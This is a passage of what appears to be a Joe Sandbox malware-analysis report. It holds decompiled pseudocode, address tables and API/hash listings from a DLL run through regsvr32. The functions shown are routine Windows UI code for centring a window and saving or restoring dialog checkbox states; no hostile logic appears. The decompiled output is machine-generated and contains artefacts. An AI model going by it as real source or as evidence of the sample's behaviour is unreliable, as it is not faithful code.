                                                                                                                									_t141 = _t238;
                                                                                                                									L28:
                                                                                                                									return _t141;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t232 = _a4;
                                                                                                                						_t238 = E1001D5EB(_a4, _t238, 0);
                                                                                                                						if(_t238 == 0) {
                                                                                                                							break;
                                                                                                                						} else {
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					L126:
                                                                                                                				}
                                                                                                                				_t141 = 0;
                                                                                                                				__eflags = 0;
                                                                                                                				goto L28;
                                                                                                                			}

                                                                                                                0x10037cde
                                                                                                                0x10037ce2
                                                                                                                0x10037ce4
                                                                                                                0x10037ce8
                                                                                                                0x10037ce8
                                                                                                                0x10037ced
                                                                                                                0x10037cf1
                                                                                                                0x10037d01
                                                                                                                0x10037d03
                                                                                                                0x10037d05
                                                                                                                0x10037d12
                                                                                                                0x10037d18
                                                                                                                0x10037d07
                                                                                                                0x10037d08
                                                                                                                0x10037d08
                                                                                                                0x10037d1d
                                                                                                                0x10037d1f
                                                                                                                0x10037d21
                                                                                                                0x00000000
                                                                                                                0x10037d27
                                                                                                                0x10037d2d
                                                                                                                0x10037d30
                                                                                                                0x10037d33
                                                                                                                0x10037d38
                                                                                                                0x10037d3b
                                                                                                                0x10037d48
                                                                                                                0x10037d48
                                                                                                                0x00000000
                                                                                                                0x10037d3b
                                                                                                                0x10037cf3
                                                                                                                0x10037cf3
                                                                                                                0x10037cf9
                                                                                                                0x00000000
                                                                                                                0x10037cf9
                                                                                                                0x10037cf1
                                                                                                                0x10037cd8
                                                                                                                0x10037c04
                                                                                                                0x10037c04
                                                                                                                0x10037c07
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037c07
                                                                                                                0x10037bfe
                                                                                                                0x10037bf5
                                                                                                                0x00000000
                                                                                                                0x10037ab2
                                                                                                                0x10037ab2
                                                                                                                0x10037c41
                                                                                                                0x10037c41
                                                                                                                0x10037c41
                                                                                                                0x00000000
                                                                                                                0x10037ab8
                                                                                                                0x10037ab8
                                                                                                                0x10037abb
                                                                                                                0x00000000
                                                                                                                0x10037ac1
                                                                                                                0x10037ac1
                                                                                                                0x10037ac4
                                                                                                                0x10037b63
                                                                                                                0x10037b65
                                                                                                                0x00000000
                                                                                                                0x10037b6b
                                                                                                                0x10037b6d
                                                                                                                0x10037b73
                                                                                                                0x10037b78
                                                                                                                0x10037b7b
                                                                                                                0x10037b7e
                                                                                                                0x10037b83
                                                                                                                0x10037b88
                                                                                                                0x10037b8a
                                                                                                                0x00000000
                                                                                                                0x10037b90
                                                                                                                0x10037b90
                                                                                                                0x10037b94
                                                                                                                0x10037ba9
                                                                                                                0x10037bab
                                                                                                                0x10037bad
                                                                                                                0x10037bbb
                                                                                                                0x10037bbd
                                                                                                                0x10037baf
                                                                                                                0x10037bb0
                                                                                                                0x10037bb0
                                                                                                                0x10037bc2
                                                                                                                0x10037bc4
                                                                                                                0x10037bc6
                                                                                                                0x10037bcf
                                                                                                                0x10037bd4
                                                                                                                0x10037bdd
                                                                                                                0x10037be3
                                                                                                                0x10037be3
                                                                                                                0x10037b96
                                                                                                                0x10037b96
                                                                                                                0x10037b9c
                                                                                                                0x10037b9e
                                                                                                                0x10037b9e
                                                                                                                0x00000000
                                                                                                                0x10037b94
                                                                                                                0x10037b8a
                                                                                                                0x00000000
                                                                                                                0x10037aca
                                                                                                                0x10037aca
                                                                                                                0x10037acd
                                                                                                                0x10037c0d
                                                                                                                0x10037c0d
                                                                                                                0x10037c0f
                                                                                                                0x00000000
                                                                                                                0x10037c15
                                                                                                                0x10037c18
                                                                                                                0x10037c1d
                                                                                                                0x10037c1f
                                                                                                                0x10037c20
                                                                                                                0x10037c31
                                                                                                                0x10037c22
                                                                                                                0x10037c22
                                                                                                                0x10037c25
                                                                                                                0x10037c27
                                                                                                                0x10037c27
                                                                                                                0x10037c36
                                                                                                                0x10037c38
                                                                                                                0x10037c3a
                                                                                                                0x10037c3d
                                                                                                                0x10037c58
                                                                                                                0x10037c58
                                                                                                                0x10037c5a
                                                                                                                0x10037c5f
                                                                                                                0x10037c61
                                                                                                                0x10037c6f
                                                                                                                0x10037c72
                                                                                                                0x00000000
                                                                                                                0x10037c78
                                                                                                                0x10037c78
                                                                                                                0x10037c79
                                                                                                                0x10037c7a
                                                                                                                0x10037c7b
                                                                                                                0x10037c7d
                                                                                                                0x10037c82
                                                                                                                0x10037c83
                                                                                                                0x10037c86
                                                                                                                0x10037c8e
                                                                                                                0x00000000
                                                                                                                0x10037c8e
                                                                                                                0x10037c63
                                                                                                                0x10037c64
                                                                                                                0x00000000
                                                                                                                0x10037c64
                                                                                                                0x10037c3f
                                                                                                                0x10037c43
                                                                                                                0x10037c4e
                                                                                                                0x10037c50
                                                                                                                0x10037c52
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037c52
                                                                                                                0x10037c3d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037acd
                                                                                                                0x10037ac4
                                                                                                                0x10037abb
                                                                                                                0x10037ab2
                                                                                                                0x00000000
                                                                                                                0x10037a1c
                                                                                                                0x10037a1d
                                                                                                                0x10037a1d
                                                                                                                0x10037a1e
                                                                                                                0x10037a4a
                                                                                                                0x10037a4e
                                                                                                                0x10037a53
                                                                                                                0x10037a5a
                                                                                                                0x10037a60
                                                                                                                0x10037a60
                                                                                                                0x10037a64
                                                                                                                0x10037a68
                                                                                                                0x10037a6e
                                                                                                                0x10037a6e
                                                                                                                0x10037a72
                                                                                                                0x00000000
                                                                                                                0x10037a78
                                                                                                                0x10037a78
                                                                                                                0x10037a7f
                                                                                                                0x10037a84
                                                                                                                0x10037a86
                                                                                                                0x00000000
                                                                                                                0x10037a88
                                                                                                                0x10037a88
                                                                                                                0x10037a8b
                                                                                                                0x10037a8d
                                                                                                                0x00000000
                                                                                                                0x10037a8f
                                                                                                                0x10037a90
                                                                                                                0x10037a92
                                                                                                                0x10037d4e
                                                                                                                0x10037d4e
                                                                                                                0x10037d4e
                                                                                                                0x10037a8d
                                                                                                                0x00000000
                                                                                                                0x10037a86
                                                                                                                0x10037a6a
                                                                                                                0x10037a6a
                                                                                                                0x10037a6c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037a6c
                                                                                                                0x10037a5c
                                                                                                                0x10037a5c
                                                                                                                0x10037a5e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037a5e
                                                                                                                0x10037a20
                                                                                                                0x10037a20
                                                                                                                0x10037a23
                                                                                                                0x10037ad3
                                                                                                                0x10037ad3
                                                                                                                0x10037ad6
                                                                                                                0x10037adc
                                                                                                                0x10037ae4

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                • String ID:
                                                                                                                • API String ID: 656273425-0
                                                                                                                • Opcode ID: 2efc149a44e08410695b2123a15573a385b54c10866b613c06230b10019cb53b
                                                                                                                • Instruction ID: e5e9ede085d456cabbb09e6b8975b7e97edbb018c7e102b9f1eac511fcbcea72
                                                                                                                • Opcode Fuzzy Hash: 2efc149a44e08410695b2123a15573a385b54c10866b613c06230b10019cb53b
                                                                                                                • Instruction Fuzzy Hash: CBF1AD359006069FDF72DB65C884BAE77F6FF44292F11402AE849AF161DB30ED80DB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 89%
                                                                                                                			E100195F7(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				struct tagRECT _v28;
                                                                                                                				struct tagRECT _v44;
                                                                                                                				struct tagRECT _v60;
                                                                                                                				struct tagRECT _v80;
                                                                                                                				char _v100;
                                                                                                                				void* __edi;
                                                                                                                				intOrPtr _t58;
                                                                                                                				struct HWND__* _t59;
                                                                                                                				intOrPtr _t94;
                                                                                                                				signed int _t103;
                                                                                                                				struct HWND__* _t104;
                                                                                                                				void* _t105;
                                                                                                                				struct HWND__* _t107;
                                                                                                                				long _t108;
                                                                                                                				long _t116;
                                                                                                                				void* _t119;
                                                                                                                				struct HWND__* _t121;
                                                                                                                				void* _t123;
                                                                                                                				intOrPtr _t125;
                                                                                                                				intOrPtr _t129;
                                                                                                                
                                                                                                                				_t119 = __edx;
                                                                                                                				_t105 = __ebx;
                                                                                                                				_t125 = __ecx;
                                                                                                                				_v12 = __ecx;
                                                                                                                				_v8 = E1001D23C(__ecx);
                                                                                                                				_t58 = _a4;
                                                                                                                				if(_t58 == 0) {
                                                                                                                					if((_v8 & 0x40000000) == 0) {
                                                                                                                						_t59 = GetWindow( *(__ecx + 0x20), 4);
                                                                                                                					} else {
                                                                                                                						_t59 = GetParent( *(__ecx + 0x20));
                                                                                                                					}
                                                                                                                					_t121 = _t59;
                                                                                                                					if(_t121 != 0) {
                                                                                                                						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
                                                                                                                						if(_t104 != 0) {
                                                                                                                							_t121 = _t104;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t4 = _t58 + 0x20; // 0xc033d88b
                                                                                                                					_t121 =  *_t4;
                                                                                                                				}
                                                                                                                				_push(_t105);
                                                                                                                				GetWindowRect( *(_t125 + 0x20),  &_v60);
                                                                                                                				if((_v8 & 0x40000000) != 0) {
                                                                                                                					_t107 = GetParent( *(_t125 + 0x20));
                                                                                                                					GetClientRect(_t107,  &_v28);
                                                                                                                					GetClientRect(_t121,  &_v44);
                                                                                                                					MapWindowPoints(_t121, _t107,  &_v44, 2);
                                                                                                                				} else {
                                                                                                                					if(_t121 != 0) {
                                                                                                                						_t103 = GetWindowLongA(_t121, 0xfffffff0);
                                                                                                                						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
                                                                                                                							_t121 = 0;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_v100 = 0x28;
                                                                                                                					if(_t121 != 0) {
                                                                                                                						GetWindowRect(_t121,  &_v44);
                                                                                                                						E1001764E(_t121, E100175E3(_t121, 2),  &_v100);
                                                                                                                						CopyRect( &_v28,  &_v80);
                                                                                                                					} else {
                                                                                                                						_t94 = E10004700();
                                                                                                                						if(_t94 != 0) {
                                                                                                                							_t94 =  *((intOrPtr*)(_t94 + 0x20));
                                                                                                                						}
                                                                                                                						E1001764E(_t121, E100175E3(_t94, 1),  &_v100);
                                                                                                                						CopyRect( &_v44,  &_v80);
                                                                                                                						CopyRect( &_v28,  &_v80);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t108 = _v60.left;
                                                                                                                				asm("cdq");
                                                                                                                				_t123 = _v60.right - _t108;
                                                                                                                				asm("cdq");
                                                                                                                				_t120 = _v44.bottom;
                                                                                                                				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
                                                                                                                				_a4 = _v60.bottom - _v60.top;
                                                                                                                				asm("cdq");
                                                                                                                				asm("cdq");
                                                                                                                				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
                                                                                                                				if(_t116 >= _v28.left) {
                                                                                                                					if(_t123 + _t116 > _v28.right) {
                                                                                                                						_t116 = _t108 - _v60.right + _v28.right;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t116 = _v28.left;
                                                                                                                				}
                                                                                                                				if(_t129 >= _v28.top) {
                                                                                                                					if(_a4 + _t129 > _v28.bottom) {
                                                                                                                						_t129 = _v60.top - _v60.bottom + _v28.bottom;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t129 = _v28.top;
                                                                                                                				}
                                                                                                                				return E1001D569(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
                                                                                                                			}

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1001D23C: GetWindowLongA.USER32(?,000000F0), ref: 1001D247
                                                                                                                • GetParent.USER32(?), ref: 10019624
                                                                                                                • SendMessageA.USER32 ref: 10019647
                                                                                                                • GetWindowRect.USER32 ref: 10019661
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 10019677
                                                                                                                • CopyRect.USER32(?,?), ref: 100196C4
                                                                                                                • CopyRect.USER32(?,?), ref: 100196CE
                                                                                                                • GetWindowRect.USER32 ref: 100196D7
                                                                                                                • CopyRect.USER32(?,?), ref: 100196F3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                • String ID: (
                                                                                                                • API String ID: 808654186-3887548279
                                                                                                                • Opcode ID: a1559d798ecd20525637dee0591de1d651f6c6f6fac8c7d742a1c1caf6dcb4d9
                                                                                                                • Instruction ID: 18c05ec1aa8623333a2e9570bca1fe911905b7c065a13fcb4f8d2d905a529139
                                                                                                                • Opcode Fuzzy Hash: a1559d798ecd20525637dee0591de1d651f6c6f6fac8c7d742a1c1caf6dcb4d9
                                                                                                                • Instruction Fuzzy Hash: 69515D76900619ABDB00DFA8DC85EEEBBB9FF48350F154215F905FB295DB30E9818B60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E10013B70(void* __ebx, void* __ecx, long _a4) {
                                                                                                                				long _v4;
                                                                                                                				long _v8;
                                                                                                                				long _v12;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed char _t138;
                                                                                                                				int* _t139;
                                                                                                                				int* _t140;
                                                                                                                				int* _t144;
                                                                                                                				int* _t145;
                                                                                                                				int* _t149;
                                                                                                                				int* _t150;
                                                                                                                				int* _t154;
                                                                                                                				int* _t155;
                                                                                                                				int* _t159;
                                                                                                                				int* _t160;
                                                                                                                				int* _t164;
                                                                                                                				int* _t165;
                                                                                                                				long _t169;
                                                                                                                				long _t171;
                                                                                                                				long _t208;
                                                                                                                				signed char _t210;
                                                                                                                				signed char _t215;
                                                                                                                				int* _t219;
                                                                                                                				int _t234;
                                                                                                                				intOrPtr _t239;
                                                                                                                				intOrPtr _t241;
                                                                                                                				intOrPtr _t243;
                                                                                                                				intOrPtr _t245;
                                                                                                                				intOrPtr _t247;
                                                                                                                				intOrPtr _t249;
                                                                                                                				signed char _t271;
                                                                                                                				signed char _t277;
                                                                                                                				void* _t287;
                                                                                                                				signed char _t298;
                                                                                                                				signed char _t306;
                                                                                                                				void* _t311;
                                                                                                                				int _t312;
                                                                                                                				long _t313;
                                                                                                                
                                                                                                                				_t233 = __ebx;
                                                                                                                				_t313 = _a4;
                                                                                                                				_t138 =  *(_t313 + 0x18);
                                                                                                                				_t311 = __ecx;
                                                                                                                				if(( !_t138 & 0x00000001) == 0) {
                                                                                                                					__eflags = _t138 & 0x00000001;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t313 + 0x14)));
                                                                                                                						_push(4);
                                                                                                                						E10020287(__ebx, _t287, __ecx, _t313, __eflags);
                                                                                                                					}
                                                                                                                					_t139 =  *(_t313 + 0x28);
                                                                                                                					_t239 =  *((intOrPtr*)(_t313 + 0x2c));
                                                                                                                					_t288 =  &(_t139[1]);
                                                                                                                					__eflags =  &(_t139[1]) - _t239;
                                                                                                                					if( &(_t139[1]) > _t239) {
                                                                                                                						__eflags = _t139 - _t239 + 4;
                                                                                                                						E1001FADC(_t313, _t288, _t139 - _t239 + 4);
                                                                                                                					}
                                                                                                                					_t140 =  *(_t313 + 0x28);
                                                                                                                					 *(_t313 + 0x28) =  &(_t140[1]);
                                                                                                                					SendMessageA( *(_t311 + 0x24c), 0xf1,  *_t140, 0);
                                                                                                                					__eflags =  *(_t313 + 0x18) & 0x00000001;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t313 + 0x14)));
                                                                                                                						_push(4);
                                                                                                                						E10020287(_t233, _t288, _t311, _t313, __eflags);
                                                                                                                					}
                                                                                                                					_t144 =  *(_t313 + 0x28);
                                                                                                                					_t241 =  *((intOrPtr*)(_t313 + 0x2c));
                                                                                                                					_t289 =  &(_t144[1]);
                                                                                                                					__eflags =  &(_t144[1]) - _t241;
                                                                                                                					if( &(_t144[1]) > _t241) {
                                                                                                                						__eflags = _t144 - _t241 + 4;
                                                                                                                						E1001FADC(_t313, _t289, _t144 - _t241 + 4);
                                                                                                                					}
                                                                                                                					_t145 =  *(_t313 + 0x28);
                                                                                                                					 *(_t313 + 0x28) =  &(_t145[1]);
                                                                                                                					SendMessageA( *(_t311 + 0x1f8), 0xf1,  *_t145, 0);
                                                                                                                					__eflags =  *(_t313 + 0x18) & 0x00000001;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t313 + 0x14)));
                                                                                                                						_push(4);
                                                                                                                						E10020287(_t233, _t289, _t311, _t313, __eflags);
                                                                                                                					}
                                                                                                                					_t149 =  *(_t313 + 0x28);
                                                                                                                					_t243 =  *((intOrPtr*)(_t313 + 0x2c));
                                                                                                                					_t290 =  &(_t149[1]);
                                                                                                                					__eflags =  &(_t149[1]) - _t243;
                                                                                                                					if( &(_t149[1]) > _t243) {
                                                                                                                						__eflags = _t149 - _t243 + 4;
                                                                                                                						E1001FADC(_t313, _t290, _t149 - _t243 + 4);
                                                                                                                					}
                                                                                                                					_t150 =  *(_t313 + 0x28);
                                                                                                                					 *(_t313 + 0x28) =  &(_t150[1]);
                                                                                                                					SendMessageA( *(_t311 + 0x1a4), 0xf1,  *_t150, 0);
                                                                                                                					__eflags =  *(_t313 + 0x18) & 0x00000001;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t313 + 0x14)));
                                                                                                                						_push(4);
                                                                                                                						E10020287(_t233, _t290, _t311, _t313, __eflags);
                                                                                                                					}
                                                                                                                					_t154 =  *(_t313 + 0x28);
                                                                                                                					_t245 =  *((intOrPtr*)(_t313 + 0x2c));
                                                                                                                					_t291 =  &(_t154[1]);
                                                                                                                					__eflags =  &(_t154[1]) - _t245;
                                                                                                                					if( &(_t154[1]) > _t245) {
                                                                                                                						__eflags = _t154 - _t245 + 4;
                                                                                                                						E1001FADC(_t313, _t291, _t154 - _t245 + 4);
                                                                                                                					}
                                                                                                                					_t155 =  *(_t313 + 0x28);
                                                                                                                					 *(_t313 + 0x28) =  &(_t155[1]);
                                                                                                                					SendMessageA( *(_t311 + 0x150), 0xf1,  *_t155, 0);
                                                                                                                					__eflags =  *(_t313 + 0x18) & 0x00000001;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t313 + 0x14)));
                                                                                                                						_push(4);
                                                                                                                						E10020287(_t233, _t291, _t311, _t313, __eflags);
                                                                                                                					}
                                                                                                                					_t159 =  *(_t313 + 0x28);
                                                                                                                					_t247 =  *((intOrPtr*)(_t313 + 0x2c));
                                                                                                                					_t292 =  &(_t159[1]);
                                                                                                                					__eflags =  &(_t159[1]) - _t247;
                                                                                                                					if( &(_t159[1]) > _t247) {
                                                                                                                						__eflags = _t159 - _t247 + 4;
                                                                                                                						E1001FADC(_t313, _t292, _t159 - _t247 + 4);
                                                                                                                					}
                                                                                                                					_t160 =  *(_t313 + 0x28);
                                                                                                                					 *(_t313 + 0x28) =  &(_t160[1]);
                                                                                                                					SendMessageA( *(_t311 + 0xfc), 0xf1,  *_t160, 0);
                                                                                                                					__eflags =  *(_t313 + 0x18) & 0x00000001;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t313 + 0x14)));
                                                                                                                						_push(4);
                                                                                                                						E10020287(_t233, _t292, _t311, _t313, __eflags);
                                                                                                                					}
                                                                                                                					_t164 =  *(_t313 + 0x28);
                                                                                                                					_t249 =  *((intOrPtr*)(_t313 + 0x2c));
                                                                                                                					_t293 =  &(_t164[1]);
                                                                                                                					__eflags =  &(_t164[1]) - _t249;
                                                                                                                					if( &(_t164[1]) > _t249) {
                                                                                                                						__eflags = _t164 - _t249 + 4;
                                                                                                                						E1001FADC(_t313, _t293, _t164 - _t249 + 4);
                                                                                                                					}
                                                                                                                					_t165 =  *(_t313 + 0x28);
                                                                                                                					 *(_t313 + 0x28) =  &(_t165[1]);
                                                                                                                					SendMessageA( *(_t311 + 0xa8), 0xf1,  *_t165, 0);
                                                                                                                					_t169 = SendMessageA( *(_t311 + 0xfc), 0xf0, 0, 0);
                                                                                                                					__eflags = _t169;
                                                                                                                					if(_t169 != 0) {
                                                                                                                						E1001D39A(_t311 + 0x88, 0);
                                                                                                                						SendMessageA( *(_t311 + 0xa8), 0xf1, 0, 0);
                                                                                                                					}
                                                                                                                					_t171 = SendMessageA( *(_t311 + 0xa8), 0xf0, 0, 0);
                                                                                                                					__eflags = _t171;
                                                                                                                					if(_t171 == 0) {
                                                                                                                						return _t171;
                                                                                                                					} else {
                                                                                                                						E1001D39A(_t311 + 0xdc, 0);
                                                                                                                						return SendMessageA( *(_t311 + 0xfc), 0xf1, 0, 0);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_push(__ebx);
                                                                                                                				_v4 = SendMessageA( *(__ecx + 0xa8), 0xf0, 0, 0);
                                                                                                                				_v8 = SendMessageA( *(_t311 + 0xfc), 0xf0, 0, 0);
                                                                                                                				_v12 = SendMessageA( *(_t311 + 0x150), 0xf0, 0, 0);
                                                                                                                				_a4 = SendMessageA( *(_t311 + 0x1a4), 0xf0, 0, 0);
                                                                                                                				_t234 = SendMessageA( *(_t311 + 0x1f8), 0xf0, 0, 0);
                                                                                                                				_t208 = SendMessageA( *(_t311 + 0x24c), 0xf0, 0, 0);
                                                                                                                				_t298 =  !( *(_t313 + 0x18));
                                                                                                                				_t319 = _t298 & 0x00000001;
                                                                                                                				_t312 = _t208;
                                                                                                                				if((_t298 & 0x00000001) == 0) {
                                                                                                                					_push( *((intOrPtr*)(_t313 + 0x14)));
                                                                                                                					_push(2);
                                                                                                                					E10020287(_t234, _t298, _t312, _t313, _t319);
                                                                                                                				}
                                                                                                                				if( &(( *(_t313 + 0x28))[1]) >  *((intOrPtr*)(_t313 + 0x2c))) {
                                                                                                                					E1001FA65(_t313);
                                                                                                                				}
                                                                                                                				_t299 =  *(_t313 + 0x28);
                                                                                                                				 *( *(_t313 + 0x28)) = _t312;
                                                                                                                				 *(_t313 + 0x28) =  &(( *(_t313 + 0x28))[1]);
                                                                                                                				_t210 =  !( *(_t313 + 0x18));
                                                                                                                				_t321 = _t210 & 0x00000001;
                                                                                                                				if((_t210 & 0x00000001) == 0) {
                                                                                                                					_push( *((intOrPtr*)(_t313 + 0x14)));
                                                                                                                					_push(2);
                                                                                                                					E10020287(_t234, _t299, _t312, _t313, _t321);
                                                                                                                				}
                                                                                                                				if( &(( *(_t313 + 0x28))[1]) >  *((intOrPtr*)(_t313 + 0x2c))) {
                                                                                                                					E1001FA65(_t313);
                                                                                                                				}
                                                                                                                				 *( *(_t313 + 0x28)) = _t234;
                                                                                                                				 *(_t313 + 0x28) =  &(( *(_t313 + 0x28))[1]);
                                                                                                                				_t271 =  !( *(_t313 + 0x18));
                                                                                                                				_t323 = _t271 & 0x00000001;
                                                                                                                				if((_t271 & 0x00000001) == 0) {
                                                                                                                					_push( *((intOrPtr*)(_t313 + 0x14)));
                                                                                                                					_push(2);
                                                                                                                					E10020287(_t234,  *((intOrPtr*)(_t313 + 0x14)), _t312, _t313, _t323);
                                                                                                                				}
                                                                                                                				if( &(( *(_t313 + 0x28))[1]) >  *((intOrPtr*)(_t313 + 0x2c))) {
                                                                                                                					E1001FA65(_t313);
                                                                                                                				}
                                                                                                                				_t302 = _a4;
                                                                                                                				 *( *(_t313 + 0x28)) = _a4;
                                                                                                                				 *(_t313 + 0x28) =  &(( *(_t313 + 0x28))[1]);
                                                                                                                				_t215 =  !( *(_t313 + 0x18));
                                                                                                                				_t325 = _t215 & 0x00000001;
                                                                                                                				if((_t215 & 0x00000001) == 0) {
                                                                                                                					_push( *((intOrPtr*)(_t313 + 0x14)));
                                                                                                                					_push(2);
                                                                                                                					E10020287(_t234, _t302, _t312, _t313, _t325);
                                                                                                                				}
                                                                                                                				if( &(( *(_t313 + 0x28))[1]) >  *((intOrPtr*)(_t313 + 0x2c))) {
                                                                                                                					E1001FA65(_t313);
                                                                                                                				}
                                                                                                                				 *( *(_t313 + 0x28)) = _v12;
                                                                                                                				 *(_t313 + 0x28) =  &(( *(_t313 + 0x28))[1]);
                                                                                                                				_t306 =  !( *(_t313 + 0x18));
                                                                                                                				_t327 = _t306 & 0x00000001;
                                                                                                                				if((_t306 & 0x00000001) == 0) {
                                                                                                                					_push( *((intOrPtr*)(_t313 + 0x14)));
                                                                                                                					_push(2);
                                                                                                                					E10020287(_t234, _t306, _t312, _t313, _t327);
                                                                                                                				}
                                                                                                                				if( &(( *(_t313 + 0x28))[1]) >  *((intOrPtr*)(_t313 + 0x2c))) {
                                                                                                                					E1001FA65(_t313);
                                                                                                                				}
                                                                                                                				 *( *(_t313 + 0x28)) = _v8;
                                                                                                                				 *(_t313 + 0x28) =  &(( *(_t313 + 0x28))[1]);
                                                                                                                				_t277 =  !( *(_t313 + 0x18));
                                                                                                                				_t329 = _t277 & 0x00000001;
                                                                                                                				if((_t277 & 0x00000001) == 0) {
                                                                                                                					_push( *((intOrPtr*)(_t313 + 0x14)));
                                                                                                                					_push(2);
                                                                                                                					E10020287(_t234,  *((intOrPtr*)(_t313 + 0x14)), _t312, _t313, _t329);
                                                                                                                				}
                                                                                                                				_t219 =  &(( *(_t313 + 0x28))[1]);
                                                                                                                				if(_t219 >  *((intOrPtr*)(_t313 + 0x2c))) {
                                                                                                                					_t219 = E1001FA65(_t313);
                                                                                                                				}
                                                                                                                				 *( *(_t313 + 0x28)) = _v4;
                                                                                                                				 *(_t313 + 0x28) =  &(( *(_t313 + 0x28))[1]);
                                                                                                                				return _t219;
                                                                                                                			}

                                                                                                                0x10013e26
                                                                                                                0x10013e27
                                                                                                                0x10013e29
                                                                                                                0x10013e29
                                                                                                                0x10013e2e
                                                                                                                0x10013e31
                                                                                                                0x10013e34
                                                                                                                0x10013e37
                                                                                                                0x10013e39
                                                                                                                0x10013e3d
                                                                                                                0x10013e43
                                                                                                                0x10013e43
                                                                                                                0x10013e48
                                                                                                                0x10013e53
                                                                                                                0x10013e62
                                                                                                                0x10013e64
                                                                                                                0x10013e68
                                                                                                                0x10013e6d
                                                                                                                0x10013e6e
                                                                                                                0x10013e70
                                                                                                                0x10013e70
                                                                                                                0x10013e75
                                                                                                                0x10013e78
                                                                                                                0x10013e7b
                                                                                                                0x10013e7e
                                                                                                                0x10013e80
                                                                                                                0x10013e84
                                                                                                                0x10013e8a
                                                                                                                0x10013e8a
                                                                                                                0x10013e8f
                                                                                                                0x10013e9a
                                                                                                                0x10013ea9
                                                                                                                0x10013eab
                                                                                                                0x10013eaf
                                                                                                                0x10013eb4
                                                                                                                0x10013eb5
                                                                                                                0x10013eb7
                                                                                                                0x10013eb7
                                                                                                                0x10013ebc
                                                                                                                0x10013ebf
                                                                                                                0x10013ec2
                                                                                                                0x10013ec5
                                                                                                                0x10013ec7
                                                                                                                0x10013ecb
                                                                                                                0x10013ed1
                                                                                                                0x10013ed1
                                                                                                                0x10013ed6
                                                                                                                0x10013ee1
                                                                                                                0x10013ef0
                                                                                                                0x10013f02
                                                                                                                0x10013f04
                                                                                                                0x10013f06
                                                                                                                0x10013f10
                                                                                                                0x10013f25
                                                                                                                0x10013f25
                                                                                                                0x10013f37
                                                                                                                0x10013f39
                                                                                                                0x10013f3b
                                                                                                                0x10013d41
                                                                                                                0x10013f41
                                                                                                                0x10013f49
                                                                                                                0x10013f66
                                                                                                                0x10013f66
                                                                                                                0x10013f3b
                                                                                                                0x10013b98
                                                                                                                0x10013ba9
                                                                                                                0x10013bcb
                                                                                                                0x10013be1
                                                                                                                0x10013beb
                                                                                                                0x10013c0d
                                                                                                                0x10013c0f
                                                                                                                0x10013c14
